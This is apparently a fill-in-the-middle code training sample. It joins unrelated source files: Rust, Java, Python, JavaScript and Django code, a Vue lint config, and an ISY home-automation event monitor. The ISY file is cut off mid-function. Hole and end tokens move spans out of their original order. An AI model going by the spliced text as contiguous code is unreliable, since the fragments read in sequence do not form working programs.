env: {
node: true,
},
extends: ['plugin:vue/essential', '@vue/prettier', '@vue/typescript'],
rules: {
'vue/max-attributes-per-line': 'off',
'vue/html-self-closing': 'off',
},
parserOptions: {
parser: '@typescript-eslint/parser',<|fim▁hole|><|fim▁end|> | },
} |
<|file_name|>ball_to_polyline.rs<|end_file_name|><|fim▁begin|>use na::Pnt2;
use na;
use math::Scalar;
use entities::shape::Ball2;
use procedural::Polyline2;
use procedural;
use super::ToPolyline;
impl<N: Scalar> ToPolyline<Pnt2<N>, u32> for Ball2<N> {
    /// Approximates this 2D ball as a polyline circle with `nsubdiv` subdivisions.
    fn to_polyline(&self, nsubdiv: u32) -> Polyline2<N> {
        // `procedural::circle` is parameterized by diameter, while `Ball2`
        // stores a radius, so convert first.
        let diameter = self.radius() * na::cast(2.0f64);

        procedural::circle(&diameter, nsubdiv)
    }
}
<|file_name|>TestSRILM.java<|end_file_name|><|fim▁begin|>package edu.stanford.nlp.lm;
import java.io.File;
import java.util.Arrays;
/**
* This is a simple test of srilm.
* @author Alexandre Denis<|fim▁hole|> */
public class TestSRILM
{
	/**
	 * Loads an order-3 SRILM language model from resources/ranking/lm-genia-lemma
	 * and prints the sentence log-probability of a well-formed sentence followed
	 * by a shuffled word sequence, for comparison.
	 *
	 * @param args unused
	 */
	public static void main(String[] args)
	{
		SRILanguageModel model = new SRILanguageModel(new File("resources/ranking/lm-genia-lemma"), 3);
		System.out.println(model.getSentenceLogProb(Arrays.asList("the central nucleotide be proportional to the size of the vacuole".split(" "))));
		System.out.println(model.getSentenceLogProb(Arrays.asList("the be size to the nucleotide vacuole central the proportional to".split(" "))));
	}
}
<|file_name|>g.py<|end_file_name|><|fim▁begin|># coding=utf-8
"""g[ravity] class."""
from foamfile import FoamFile, foam_file_from_file
from collections import OrderedDict


class G(FoamFile):
    """G (gravity) class.

    Wraps the OpenFOAM ``constant/g`` dictionary, exposing the gravity
    vector as a Python tuple via the ``value`` property.
    """

    # set default values for this class
    __default_values = OrderedDict()
    __default_values['dimensions'] = '[0 1 -2 0 0 0 0]'
    __default_values['#include'] = None
    __default_values['value'] = '(0 0 -9.81)'

    def __init__(self, values=None):
        """Init class."""
        FoamFile.__init__(self, name='g',
                          cls='uniformDimensionedVectorField',
                          location='constant',
                          default_values=self.__default_values,
                          values=values)

    @classmethod
    def from_file(cls, filepath):
        """Create a FoamFile from a file.

        Args:
            filepath: Full file path to dictionary.
        """
        return cls(values=foam_file_from_file(filepath, cls.__name__))

    @property
    def dimensions(self):
        """Dimension string for acceleration ('[0 1 -2 0 0 0 0]' by default)."""
        return self.values['dimensions']

    @property
    def value(self):
        """Gravity vector as a tuple of numbers, e.g. (0, 0, -9.81)."""
        # IMPROVEMENT: parse the stored '(x y z)' string explicitly instead of
        # rewriting it into a Python expression and calling eval() on it.
        def _num(token):
            # Keep integral components as ints (matching the old eval result).
            try:
                return int(token)
            except ValueError:
                return float(token)

        raw = self.values['value'].strip().strip('()')
        return tuple(_num(token) for token in raw.split())

    @value.setter
    def value(self, vec):
        """Set gravity vector from a 3-item sequence of numbers."""
        assert len(vec) == 3, \
            ValueError('Gravity vector must be a tuple with 3 values.')
        self.values['value'] = '({})'.format(' '.join((str(v) for v in vec)))
<|file_name|>prelink.py<|end_file_name|><|fim▁begin|>#!/bin/python
import os, subprocess
import logging
from autotest.client import test
from autotest.client.shared import error, software_manager
sm = software_manager.SoftwareManager()
class prelink(test.test):
    """
    Autotest module for testing basic functionality
    of prelink
    @author Athira Rajeev <[email protected]>
    """
    version = 1
    # Overall failure counter; non-zero at postprocess time fails the job.
    nfail = 0
    path = ''

    def initialize(self, test_path=''):
        """
        Sets the overall failure counter for the test.
        """
        self.nfail = 0
        # Make sure the compilers needed by the test's Makefile are present.
        for package in ['gcc', 'gcc-c++']:
            if not sm.check_installed(package):
                logging.debug("%s missing - trying to install", package)
                sm.install(package)
        # Build the test binaries shipped under <test_path>/prelink.
        ret_val = subprocess.Popen(['make', 'all'], cwd="%s/prelink" %(test_path))
        ret_val.communicate()
        if ret_val.returncode != 0:
            self.nfail += 1
        logging.info('\n Test initialize successfully')

    def run_once(self, test_path=''):
        """
        Trigger test run
        """
        try:
            # The prelink.sh wrapper expects LTPBIN to point at shared helpers.
            os.environ["LTPBIN"] = "%s/shared" %(test_path)
            ret_val = subprocess.Popen(['./prelink.sh'], cwd="%s/prelink" %(test_path))
            ret_val.communicate()
            if ret_val.returncode != 0:
                self.nfail += 1
        except error.CmdError, e:
            self.nfail += 1
            logging.error("Test Failed: %s", e)

    def postprocess(self):
        # Fail the autotest job if any earlier stage recorded a failure.
        if self.nfail != 0:
            logging.info('\n nfails is non-zero')
            raise error.TestError('\nTest failed')
        else:
            logging.info('\n Test completed successfully ')
<|file_name|>urls.py<|end_file_name|><|fim▁begin|># -*- coding:utf-8 -*-
from werkzeug.routing import Map, Submount
import libcloud
from libcloud_rest.api.handlers import app_handler
from libcloud_rest.api.handlers.compute import compute_handler<|fim▁hole|>from libcloud_rest.api.handlers.storage import storage_handler
from libcloud_rest.api.versions import versions
# URL prefix for the current libcloud version, e.g. '/<mapped version>'.
api_version = '/%s' % (versions[libcloud.__version__])

# Top-level routing map: app-level rules at the root, and the per-service
# handler rules (compute, dns, loadbalancer, storage) mounted under the
# version prefix.
urls = Map([
    app_handler.get_rules(),
    Submount(api_version, [
        compute_handler.get_rules(),
        dns_handler.get_rules(),
        lb_handler.get_rules(),
        storage_handler.get_rules(),
    ])
])
from libcloud_rest.api.handlers.loadbalancer import lb_handler |
<|file_name|>forms.py<|end_file_name|><|fim▁begin|>from django import forms
from poi_manager.models import Poi, PoiCategory
from mptt.forms import TreeNodeChoiceField
class PoiCategoryForm(forms.ModelForm):
cat_name = forms.CharField(max_length=128, help_text="Please enter the category name.")
parent = TreeNodeChoiceField(queryset=PoiCategory.objects.all(), required=False)
class Meta:
model = PoiCategory<|fim▁hole|>class PoiForm(forms.ModelForm):
name = forms.CharField(max_length=128, help_text="Please enter the title of the page.")
floor_num = forms.IntegerField(initial=0, required=False)
category = TreeNodeChoiceField(queryset=PoiCategory.objects.all())
class Meta:
model = Poi
fields = ('name', 'floor_num', 'category',)<|fim▁end|> | fields = ('cat_name', 'parent',)
|
<|file_name|>deprecation-sanity.rs<|end_file_name|><|fim▁begin|>// Various checks that deprecation attributes are used correctly
mod bogus_attribute_types_1 {
#[deprecated(since = "a", note = "a", reason)] //~ ERROR unknown meta item 'reason'
fn f1() { }
<|fim▁hole|> fn f2() { }
#[deprecated(since, note = "a")] //~ ERROR incorrect meta item
fn f3() { }
#[deprecated(since = "a", note(b))] //~ ERROR incorrect meta item
fn f5() { }
#[deprecated(since(b), note = "a")] //~ ERROR incorrect meta item
fn f6() { }
#[deprecated(note = b"test")] //~ ERROR literal in `deprecated` value must be a string
fn f7() { }
#[deprecated("test")] //~ ERROR item in `deprecated` must be a key/value pair
fn f8() { }
}
#[deprecated(since = "a", note = "b")]
#[deprecated(since = "a", note = "b")] //~ ERROR multiple deprecated attributes
fn multiple1() { }
#[deprecated(since = "a", since = "b", note = "c")] //~ ERROR multiple 'since' items
fn f1() { }
struct X;
#[deprecated = "hello"] //~ ERROR this `#[deprecated]` annotation has no effect
impl Default for X {
fn default() -> Self {
X
}
}
fn main() { }<|fim▁end|> | #[deprecated(since = "a", note)] //~ ERROR incorrect meta item |
<|file_name|>entry.rs<|end_file_name|><|fim▁begin|>use consts::*;
/// A candidate placement: digit `num` in grid cell `cell`.
#[derive(Copy, Clone, Debug, PartialEq, Eq, PartialOrd, Ord)]
pub struct Entry {
    /// Cell index, row-major in a 9x9 grid (row = cell / 9, col = cell % 9).
    pub cell: u8,
    /// Digit placed in the cell; constraint math below assumes 1..=9.
    pub num: u8,
}
impl Entry {
#[inline] pub fn cell(self) -> usize { self.cell as usize }
#[inline] pub fn row(self) -> u8 { self.cell as u8 / 9 }
#[inline] pub fn col(self) -> u8 { self.cell as u8 % 9 }
#[inline] pub fn field(self) -> u8 { self.row() / 3 * 3 + self.col() / 3 }
#[inline] pub fn num(self) -> u8 { self.num }<|fim▁hole|> #[inline]
pub fn conflicts_with(self, other: Self) -> bool {
self.cell() == other.cell() ||
(self.num == other.num &&
( self.row() == other.row()
|| self.col() == other.col()
|| self.field() == other.field()
)
)
}
#[inline] pub fn num_offset(self) -> usize { self.num() as usize - 1 }
#[inline] pub fn row_constraint(self) -> usize { self.row() as usize * 9 + self.num_offset() }
#[inline] pub fn col_constraint(self) -> usize { self.col() as usize * 9 + self.num_offset() + COL_OFFSET }
#[inline] pub fn field_constraint(self) -> usize { self.field() as usize * 9 + self.num_offset() + FIELD_OFFSET }
#[inline] pub fn cell_constraint(self) -> usize { self.cell() + CELL_OFFSET }
#[inline] pub fn constrains(self, constraint_nr: usize) -> bool {
constraint_nr == match constraint_nr {
0...80 => self.row_constraint(),
81...161 => self.col_constraint(),
162...242 => self.field_constraint(),
243...323 => self.cell_constraint(),
_ => unreachable!(),
}
}
}<|fim▁end|> | |
<|file_name|>loading.js<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|> | //>>built
define("dijit/nls/da/loading",({loadingState:"Indlæser...",errorState:"Der er opstået en fejl"})); |
<|file_name|>deviceorientation.js<|end_file_name|><|fim▁begin|>goog.provide('ol.DeviceOrientation');
goog.provide('ol.DeviceOrientationProperty');
goog.require('goog.events');
goog.require('goog.math');
goog.require('ol.Object');
goog.require('ol.has');
/**
* @enum {string}
*/
ol.DeviceOrientationProperty = {
ALPHA: 'alpha',
BETA: 'beta',
GAMMA: 'gamma',
HEADING: 'heading',
TRACKING: 'tracking'
};
/**
* @classdesc
* The ol.DeviceOrientation class provides access to DeviceOrientation
* information and events, see the [HTML 5 DeviceOrientation Specification](
* http://www.w3.org/TR/orientation-event/) for more details.
*
* Many new computers, and especially mobile phones
* and tablets, provide hardware support for device orientation. Web
* developers targetting mobile devices will be especially interested in this
* class.
*
* Device orientation data are relative to a common starting point. For mobile
* devices, the starting point is to lay your phone face up on a table with the
* top of the phone pointing north. This represents the zero state. All
* angles are then relative to this state. For computers, it is the same except
* the screen is open at 90 degrees.
*
* Device orientation is reported as three angles - `alpha`, `beta`, and
* `gamma` - relative to the starting position along the three planar axes X, Y
* and Z. The X axis runs from the left edge to the right edge through the
* middle of the device. Similarly, the Y axis runs from the bottom to the top
* of the device through the middle. The Z axis runs from the back to the front
* through the middle. In the starting position, the X axis points to the
* right, the Y axis points away from you and the Z axis points straight up
* from the device lying flat.
*
* The three angles representing the device orientation are relative to the
* three axes. `alpha` indicates how much the device has been rotated around the
* Z axis, which is commonly interpreted as the compass heading (see note
* below). `beta` indicates how much the device has been rotated around the X
* axis, or how much it is tilted from front to back. `gamma` indicates how
* much the device has been rotated around the Y axis, or how much it is tilted
* from left to right.
*
* For most browsers, the `alpha` value returns the compass heading so if the
* device points north, it will be 0. With Safari on iOS, the 0 value of
* `alpha` is calculated from when device orientation was first requested.
* ol.DeviceOrientation provides the `heading` property which normalizes this
* behavior across all browsers for you.
*
* It is important to note that the HTML 5 DeviceOrientation specification
* indicates that `alpha`, `beta` and `gamma` are in degrees while the
* equivalent properties in ol.DeviceOrientation are in radians for consistency
* with all other uses of angles throughout OpenLayers.
*
* @see http://www.w3.org/TR/orientation-event/
*
* @constructor
* @extends {ol.Object}
* @fires change Triggered when the device orientation changes.
* @param {olx.DeviceOrientationOptions=} opt_options Options.
* @api
*/
ol.DeviceOrientation = function(opt_options) {

  goog.base(this);

  var options = goog.isDef(opt_options) ? opt_options : {};

  /**
   * Key of the active 'deviceorientation' listener, or null when not
   * listening.
   * @private
   * @type {goog.events.Key}
   */
  this.listenerKey_ = null;

  // Attach/detach the native listener whenever the tracking property changes.
  goog.events.listen(this,
      ol.Object.getChangeEventType(ol.DeviceOrientationProperty.TRACKING),
      this.handleTrackingChanged_, false, this);

  // Tracking is off unless explicitly enabled via the options.
  this.setTracking(goog.isDef(options.tracking) ? options.tracking : false);

};
goog.inherits(ol.DeviceOrientation, ol.Object);
/**
* @inheritDoc
*/
ol.DeviceOrientation.prototype.disposeInternal = function() {
this.setTracking(false);
goog.base(this, 'disposeInternal');
};
/**
 * Handles a native 'deviceorientation' event: converts the reported degrees
 * to radians, updates the alpha/beta/gamma properties, derives a normalized
 * compass heading where possible, and fires a change event.
 * @private
 * @param {goog.events.BrowserEvent} browserEvent Event.
 */
ol.DeviceOrientation.prototype.orientationChange_ = function(browserEvent) {
  var event = /** @type {DeviceOrientationEvent} */
      (browserEvent.getBrowserEvent());
  if (goog.isDefAndNotNull(event.alpha)) {
    var alpha = goog.math.toRadians(event.alpha);
    this.set(ol.DeviceOrientationProperty.ALPHA, alpha);
    // event.absolute is undefined in iOS.
    if (goog.isBoolean(event.absolute) && event.absolute) {
      // An absolute alpha can be used directly as the heading.
      this.set(ol.DeviceOrientationProperty.HEADING, alpha);
    } else if (goog.isDefAndNotNull(event.webkitCompassHeading) &&
               goog.isDefAndNotNull(event.webkitCompassAccuracy) &&
               event.webkitCompassAccuracy != -1) {
      // WebKit-specific compass value; an accuracy of -1 is treated here
      // as an invalid reading and ignored.
      var heading = goog.math.toRadians(event.webkitCompassHeading);
      this.set(ol.DeviceOrientationProperty.HEADING, heading);
    }
  }
  if (goog.isDefAndNotNull(event.beta)) {
    this.set(ol.DeviceOrientationProperty.BETA,
        goog.math.toRadians(event.beta));
  }
  if (goog.isDefAndNotNull(event.gamma)) {
    this.set(ol.DeviceOrientationProperty.GAMMA,
        goog.math.toRadians(event.gamma));
  }
  this.dispatchChangeEvent();
};
/**
* @return {number|undefined} The euler angle in radians of the device from the
* standard Z axis.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getAlpha = function() {
return /** @type {number|undefined} */ (
this.get(ol.DeviceOrientationProperty.ALPHA));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'getAlpha',
ol.DeviceOrientation.prototype.getAlpha);
/**
* @return {number|undefined} The euler angle in radians of the device from the
* planar X axis.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getBeta = function() {
return /** @type {number|undefined} */ (
this.get(ol.DeviceOrientationProperty.BETA));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
<|fim▁hole|>
/**
* @return {number|undefined} The euler angle in radians of the device from the
* planar Y axis.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getGamma = function() {
return /** @type {number|undefined} */ (
this.get(ol.DeviceOrientationProperty.GAMMA));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'getGamma',
ol.DeviceOrientation.prototype.getGamma);
/**
* @return {number|undefined} The heading of the device relative to north, in
* radians, normalizing for different browser behavior.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getHeading = function() {
return /** @type {number|undefined} */ (
this.get(ol.DeviceOrientationProperty.HEADING));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'getHeading',
ol.DeviceOrientation.prototype.getHeading);
/**
* Are we tracking the device's orientation?
* @return {boolean} The status of tracking changes to alpha, beta and gamma.
* If true, changes are tracked and reported immediately.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.getTracking = function() {
return /** @type {boolean} */ (
this.get(ol.DeviceOrientationProperty.TRACKING));
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'getTracking',
ol.DeviceOrientation.prototype.getTracking);
/**
 * Reacts to changes of the tracking property by attaching or detaching the
 * native 'deviceorientation' listener. No-op when the browser does not
 * support device orientation.
 * @private
 */
ol.DeviceOrientation.prototype.handleTrackingChanged_ = function() {
  if (!ol.has.DEVICE_ORIENTATION) {
    return;
  }
  var shouldTrack = this.getTracking();
  var hasListener = !goog.isNull(this.listenerKey_);
  if (shouldTrack && !hasListener) {
    this.listenerKey_ = goog.events.listen(goog.global, 'deviceorientation',
        this.orientationChange_, false, this);
  } else if (!shouldTrack && hasListener) {
    goog.events.unlistenByKey(this.listenerKey_);
    this.listenerKey_ = null;
  }
};
/**
* Enable or disable tracking of DeviceOrientation events.
* @param {boolean} tracking The status of tracking changes to alpha, beta and
* gamma. If true, changes are tracked and reported immediately.
* @observable
* @api
*/
ol.DeviceOrientation.prototype.setTracking = function(tracking) {
this.set(ol.DeviceOrientationProperty.TRACKING, tracking);
};
goog.exportProperty(
ol.DeviceOrientation.prototype,
'setTracking',
ol.DeviceOrientation.prototype.setTracking);<|fim▁end|> | 'getBeta',
ol.DeviceOrientation.prototype.getBeta);
|
<|file_name|>isyeventmonitor.py<|end_file_name|><|fim▁begin|>import base64
import errno
import random
import ssl
import threading
import time
import copy
import websocket
import xmltodict
import config
import debug
from utils import exitutils
import hubs.isy.isycodes as isycodes
import logsupport
from controlevents import CEvent, PostEvent, ConsoleEvent, PostIfInterested
from hubs.isy.isycodes import EVENT_CTRL, formatwsitem
from logsupport import ConsoleWarning, ConsoleError, ConsoleDetail, ConsoleDetailHigh
from utils.threadmanager import ThreadStartException
from utils.utilfuncs import safeprint
class ISYEMInternalError(Exception):
	# Raised by the event-stream handler when the stream gets out of sync
	# (e.g. an event sequence-number mismatch).
	pass
def BaseAddr(addr):
	"""Return `addr` with its final space-separated component removed.

	Returns None when `addr` is None, and '' when `addr` has a single
	component.
	"""
	if addr is None:
		return None
	parts = addr.split(' ')
	return ' '.join(parts[:-1])
class ISYEventMonitor(object):
def __init__(self, thisISY):
self.connectionmode = 'try994' # trypolisy: trying without subp, polisy: connection worked, try994: trying with subp 994worked.
self.isy = thisISY
self.hubname = thisISY.name
self.QHnum = 1
self.a = base64.b64encode((self.isy.user + ':' + self.isy.password).encode('utf-8'))
self.watchstarttime = time.time()
self.watchlist = []
self.streamid = "unset"
self.seq = 0
self.lastheartbeat = 0
self.hbcount = 0
self.AlertNodes = {}
self.delayedstart = 0
self.longdown = 0
self.WS = None
self.THstate = 'init'
self.querycnt = 0
self.queryqueued = {}
self.LastMsgErr = ('***', -99)
self.isy.Busy = 0
self.lasterror = 'Init'
debug.debugPrint('DaemonCtl', "Queue Handler ", self.QHnum, " started: ", self.watchstarttime)
self.reportablecodes = ["DON", "DFON", "DOF", "DFOF", "ST", "CLISP", "CLISPH", "CLISPC", "CLIFS",
"CLIMD", "CLIHUM", "CLIHCS", "BRT", "DIM"] # "RR", "OL",
	def EndWSServer(self):
		# Force-close the websocket stream after a direct-command failure;
		# the restart logic keys its delay off self.lasterror.
		self.lasterror = "DirectCommError"
		self.WS.close()
def RealQuery(self, enode, seq, ndnm):
logsupport.Logs.Log("Queued query attempt (" + str(seq) + ") for: " + ndnm)
time.sleep(105 + random.randint(0, 30)) # allow any in progress query at ISY a chance to clear
if enode not in self.isy.ErrNodes:
logsupport.Logs.Log("Node error cleared without need of query (" + str(seq) + ") for: " + ndnm)
return
logsupport.Logs.Log(self.hubname + ": Attempt query (" + str(seq) + ") for errored node: " + ndnm,
severity=ConsoleWarning)
r = self.isy.try_ISY_comm('query/' + enode, timeout=60, closeonfail=False)
if r == '':
logsupport.Logs.Log(self.hubname + ": Query (" + str(seq) + ") attempt failed for node: " + ndnm,
severity=ConsoleWarning)
else:
time.sleep(2)
logsupport.Logs.Log(self.hubname + ": Query (" + str(seq) + ") attempt succeeded for node: " + ndnm)
if enode in self.isy.ErrNodes: del self.isy.ErrNodes[enode]
if enode in self.queryqueued: del self.queryqueued[enode]
def DoNodeQuery(self, enode, ndnm):
if enode not in self.queryqueued:
self.querycnt += 1
self.queryqueued[enode] = self.querycnt
t = threading.Thread(name='Query-' + str(self.querycnt) + '-' + enode, target=self.RealQuery, daemon=True,
args=(enode, self.querycnt, ndnm))
t.start()
else:
logsupport.Logs.Log(
self.hubname + ": Query " + str(self.queryqueued[enode]) + " already queued for node: " + ndnm)
	def FakeNodeChange(self):
		# Post a synthetic node-change event (node=None, value=-1) so
		# interested screens refresh their state for this hub.
		# noinspection PyArgumentList
		PostEvent(ConsoleEvent(CEvent.HubNodeChange, hub=self.isy.name, node=None, value=-1))
	def reinit(self):
		# Reset per-stream state before (re)starting the websocket handler;
		# QHnum distinguishes successive stream instances in the logs.
		self.watchstarttime = time.time()
		self.watchlist = []
		self.seq = 0
		self.hbcount = 0
		self.QHnum += 1
def PostStartQHThread(self):
if self.isy.version == -1:
# test mode
return
hungcount = 40
while self.THstate == 'restarting':
logsupport.Logs.Log(self.hubname + " Waiting thread start")
time.sleep(2)
hungcount -= 1
if hungcount < 0: raise ThreadStartException
while self.THstate == 'delaying':
time.sleep(1)
hungcount = 60
while self.THstate == 'starting':
logsupport.Logs.Log(self.hubname + ": Waiting initial status dump")
time.sleep(2)
hungcount -= 1
if hungcount < 0: raise ThreadStartException
if self.THstate == 'running':
self.isy._HubOnline = True
self.isy.Vars.CheckValsUpToDate(reload=True)
logsupport.Logs.Log(self.hubname + ": Initial status streamed ", self.seq, " items and vars updated")
elif self.THstate == 'failed':
logsupport.Logs.Log(self.hubname + " Failed Thread Restart", severity=ConsoleWarning)
else:
logsupport.Logs.Log(self.hubname + " Unknown ISY QH Thread state")
def PreRestartQHThread(self):
self.isy._HubOnline = False
self.THstate = 'restarting'
try:
if self.lasterror == 'ISYSocketTimeOut':
logsupport.Logs.Log(self.hubname + '(TimeoutError) Wait for likely router reboot or down',
severity=ConsoleWarning, tb=False)
self.delayedstart = 150
self.reinit()
return
if self.lasterror == 'ISYWSTimeOut':
logsupport.Logs.Log(self.hubname + ' WS restart after surprise close - short delay (15)',
severity=ConsoleWarning)
self.delayedstart = 15
elif self.lasterror == 'ISYNetDown':
# likely home network down so wait a bit
logsupport.Logs.Log(self.hubname + ' WS restart for NETUNREACH - delay likely router reboot or down',
severity=ConsoleWarning)
self.delayedstart = 121
elif self.lasterror == 'ISYClose':
logsupport.Logs.Log(self.hubname + ' Recovering closed WS stream')
self.delayedstart = 2
elif self.lasterror == 'DirectCommError':
logsupport.Logs.Log(self.hubname + ' WS restart because of failed direct communication failure')
self.delayedstart = 90 # probably ISY doing query
elif self.lasterror == 'ISYNoRoute':
logsupport.Logs.Log("{}: Hub probably down (semi) permanently ({})".self.name, self.longdown)
self.delayedstart = 3600 + self.longdown * 1800 # spread checks way out
self.isy._HubOnline = False
self.longdown += 1
else:
logsupport.Logs.Log(self.hubname + ' Unexpected error on WS stream: ', self.lasterror,
severity=ConsoleError, tb=False)
self.delayedstart = 90
except Exception as e:
logsupport.Logs.Log(self.hubname + ' PreRestartQH internal error ', e)
self.reinit()
def QHandler(self):
def on_error(qws, error):
self.isy.HBWS.Entry(repr(error))
self.lasterror = "ISYUnknown"
reconsev = ConsoleWarning if config.sysStore.ErrLogReconnects else logsupport.ConsoleInfo
if isinstance(error, websocket.WebSocketConnectionClosedException):
logsupport.Logs.Log(self.hubname + " WS connection closed - attempt to recontact ISY",
severity=reconsev)
self.lasterror = 'ISYClose'
elif isinstance(error, websocket.WebSocketTimeoutException):
logsupport.Logs.Log(self.hubname + " WS connection timed out", severity=ConsoleWarning)
self.lasterror = 'ISYWSTimeOut'
elif isinstance(error, TimeoutError):
logsupport.Logs.Log(self.hubname + " WS socket timed out", severity=ConsoleWarning)
self.lasterror = 'ISYSocketTimeOut'
elif isinstance(error, AttributeError):
logsupport.Logs.Log(self.hubname + " WS library bug", severity=ConsoleWarning)
self.lasterror = 'ISYClose'
elif isinstance(error, OSError):
if error.errno == errno.ENETUNREACH:
logsupport.Logs.Log(self.hubname + " WS network down", severity=ConsoleWarning)
self.lasterror = 'ISYNetDown'
else:
logsupport.Logs.Log(self.hubname + ' WS OS error', repr(error), severity=ConsoleError, tb=False)
self.lasterror = 'ISYNoRoute' # probably semi permanent failure
else:
if self.connectionmode == 'try994':
logsupport.Logs.Log("{}: Connection failed using 994 convention".format(self.hubname))
self.connectionmode = 'trypolisy'
elif self.connectionmode == 'trypolisy':
logsupport.Logs.Log("{}: Connection failed using Polisy convention".format(self.hubname))
self.connectionmode = 'try994'
else:
logsupport.Logs.Log(self.hubname + " Error in WS stream " + str(self.QHnum) + ': ' + repr(error),
severity=ConsoleError,
tb=True)
logsupport.Logs.Log(repr(websocket.WebSocketConnectionClosedException))
self.THstate = 'failed'
debug.debugPrint('DaemonCtl', "Websocket stream error", self.QHnum, repr(error))
qws.close()
# noinspection PyUnusedLocal
def on_close(qws, code, reason):
self.isy.HBWS.Entry("Close")
reconsev = ConsoleWarning if config.sysStore.ErrLogReconnects else logsupport.ConsoleInfo
logsupport.Logs.Log("{} WS stream {} closed: {}:{}".format(self.hubname, self.QHnum, code, reason),
severity=reconsev, hb=True)
debug.debugPrint('DaemonCtl', "ISY Websocket stream closed", str(code), str(reason))
def on_open(qws):
self.isy.HBWS.Entry("Open")
self.THstate = 'starting'
if self.connectionmode == 'try994':
self.connectionmode = '994worked'
logsupport.Logs.Log('{} connection worked using 994 convention'.format(self.isy.name))
elif self.connectionmode == 'trypolisy':
self.connectionmode = 'polisyworked'
logsupport.Logs.Log('{} connection worked using Polisy convention'.format(self.isy.name))
mess = '994' if self.connectionmode == '994worked' else 'Polisy' if self.connectionmode == 'polisyworked' else self.connectionmode
logsupport.Logs.Log("{}: WS stream {} opened ({})".format(self.hubname, self.QHnum, mess))
debug.debugPrint('DaemonCtl', "Websocket stream opened: ", self.QHnum, self.streamid)
self.WS = qws
# noinspection PyUnusedLocal,PyUnboundLocalVariable
def on_message(qws, message):
loopstart = time.time()
self.isy.HBWS.Entry('Message: {}'.format(repr(message)))
# print('Message: {}'.format(message))
try:
m = 'parse error'
m = xmltodict.parse(message)
msav = copy.deepcopy(m)
if debug.dbgStore.GetVal('ISYDump'):
debug.ISYDump("isystream.dmp", message, pretty=False)
# print(m)
if 'SubscriptionResponse' in m:
sr = m['SubscriptionResponse']
if self.streamid != sr['SID']:
self.streamid = sr['SID']
logsupport.Logs.Log("{}: Stream id: {}".format(self.hubname, self.streamid))
elif 'Event' in m:
E = m['Event']
esid = E.pop('@sid', 'No sid')
if self.streamid != esid:
logsupport.Logs.Log(
self.hubname + " Unexpected event stream change: " + self.streamid + "/" + str(esid),
severity=ConsoleError, tb=False)
exitutils.FatalError("WS Stream ID Changed")
eseq = int(E.pop('@seqnum', -99))
if self.seq != eseq:
logsupport.Logs.Log(
self.hubname + " Event mismatch - Expected: " + str(self.seq) + " Got: " + str(eseq),
severity=ConsoleWarning)
raise ISYEMInternalError
else:
self.seq += 1
ecode = E.pop('control', 'Missing control')
if ecode in EVENT_CTRL:
prcode = EVENT_CTRL[ecode]
else:
prcode = "**" + ecode + "**"
eaction = E.pop('action', 'No action')
enode = E.pop('node', 'No node')
eInfo = E.pop('eventInfo', 'No EventInfo')
if isinstance(eaction, dict):
debug.debugPrint('DaemonStream', "V5 stream - pull up action value: ", eaction)
eaction = eaction["#text"] # the new xmltodict will return as data['action']['#text']
if enode in self.isy.NodesByAddr: # get the node to set if any
N = self.isy.NodesByAddr[enode]
else:
N = None
<|fim▁hole|> if ecode == 'ST': # update cached state first before posting alerts or race
if isinstance(N, isycodes.ThermType):
N.cur = isycodes.NormalizeState(eaction)
elif N is not None:
oldstate = N.devState
N.devState = isycodes.NormalizeState(eaction)
logsupport.Logs.Log('ISYchg', 'ISY Node: ', N.name, ' state change from: ', oldstate,
' to: ', N.devState, severity=ConsoleDetailHigh)
if (oldstate == N.devState) and self.THstate == 'running':
logsupport.Logs.Log(self.hubname +
" State report with no change: " + N.name + ' state: ' + str(
oldstate))
else:
logsupport.Logs.Log(self.hubname +
" Status change for " + N.name + '(' + str(enode) + ') to ' + str(
N.devState), severity=ConsoleDetailHigh)
# status changed to post to any alerts that want it
# since alerts can only react to the state of a node we check only on an ST message
# screens on the other hand may need to know about other actions (thermostat e.g.)
# so they get checked below under reportablecodes
# if I check alerts there I get extra invocations for the DON and DOF e.g. which while not
# harmful are anomolous
if enode in self.AlertNodes:
# alert node changed
debug.debugPrint('DaemonCtl', 'ISY reports change(alert):',
self.isy.NodesByAddr[enode].name)
for a in self.AlertNodes[enode]:
if self.THstate != 'running':
# this is a restart or initial dump so indicate upwards to avoid misleading log entry
if a.state == 'Armed':
a.state = 'Init'
logsupport.Logs.Log(self.hubname + " Node alert fired: " + str(a),
severity=ConsoleDetail)
# noinspection PyArgumentList
PostEvent(ConsoleEvent(CEvent.ISYAlert, hub=self.isy.name, node=enode,
value=isycodes.NormalizeState(eaction), alert=a))
elif ecode == 'CLIHCS' and isinstance(N, isycodes.ThermType):
N.statecode = isycodes.NormalizeState(eaction)
elif ecode == 'CLIFS' and isinstance(N, isycodes.ThermType):
N.fancode = isycodes.NormalizeState(eaction)
elif ecode == 'CLIMD' and isinstance(N, isycodes.ThermType):
N.modecode = isycodes.NormalizeState(eaction)
elif ecode == 'CLIHUM' and isinstance(N, isycodes.ThermType):
N.hum = isycodes.NormalizeState(eaction)
elif ecode == 'CLISPH' and isinstance(N, isycodes.ThermType):
N.setlow = isycodes.NormalizeState(eaction)
elif ecode == 'CLISPC' and isinstance(N, isycodes.ThermType):
N.sethigh = isycodes.NormalizeState(eaction)
if ecode in self.reportablecodes:
# Node change report
debug.debugPrint('DaemonStream', time.time() - config.sysStore.ConsoleStartTime,
"Status update in stream: ",
eseq, ":",
prcode, " : ", enode, " : ", eInfo, " : ", eaction)
# logsupport.Logs.Log('reportable event '+str(ecode)+' for '+str(enode)+' action '+str(eaction))
PostIfInterested(self.isy, enode, isycodes.NormalizeState(eaction))
elif (prcode == 'Trigger') and (eaction == '6'):
vinfo = eInfo['var']
vartype = int(vinfo['@type'])
varid = int(vinfo['@id'])
varval = int(vinfo['val'])
debug.debugPrint('DaemonCtl', 'Var change: ', self.isy.Vars.GetNameFromAttr((vartype, varid)),
' set to ', varval)
debug.debugPrint('DaemonCtl', 'Var change:', ('Unkn', 'Integer', 'State')[vartype],
' variable ', varid,
' set to ', varval)
try:
